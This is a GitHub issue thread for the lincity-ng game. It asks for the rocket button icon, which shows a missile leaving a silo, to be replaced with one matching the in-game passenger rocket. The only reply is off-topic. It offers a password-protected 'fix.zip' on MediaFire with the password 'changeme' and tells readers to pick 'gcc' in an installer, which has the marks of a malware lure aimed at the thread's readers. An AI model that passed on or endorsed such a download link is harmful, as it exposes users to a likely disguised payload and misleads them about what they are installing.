### ISSUE TITLE
[request for a graphic designer] - replace rocket icon

### ISSUE THREAD

**Issue by FabioPedretti** [lincity-ng/lincity-ng#178]
Current rocket buttonpanel icon show a missile going out of a silo (silos are used for missiles as in weapons) and doesn't match the actual game rocket (used to transport people).

It would be nice if someone replace the current buttonpanel icon with another one resembling the actual in game rocket.

**Buttonpanel icon:**
https://github.com/lincity-ng/lincity-ng/blob/master/data/images/gui/buttonpanel/transport/rocket.svg
<img src="https://github.com/user-attachments/assets/d2034444-c738-4623-8a4b-96f2cfe1edc9" width="48">
https://github.com/lincity-ng/lincity-ng/blob/master/data/images/gui/buttonpanel/transport/rocket.png
![rocket](https://github.com/user-attachments/assets/f1cddfc2-3350-46f6-ab3d-0186de071f40)

**Actual rocket in game:**
<img src="https://github.com/user-attachments/assets/84e9d41f-981e-443b-9034-27b39d4be957" width="256">

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
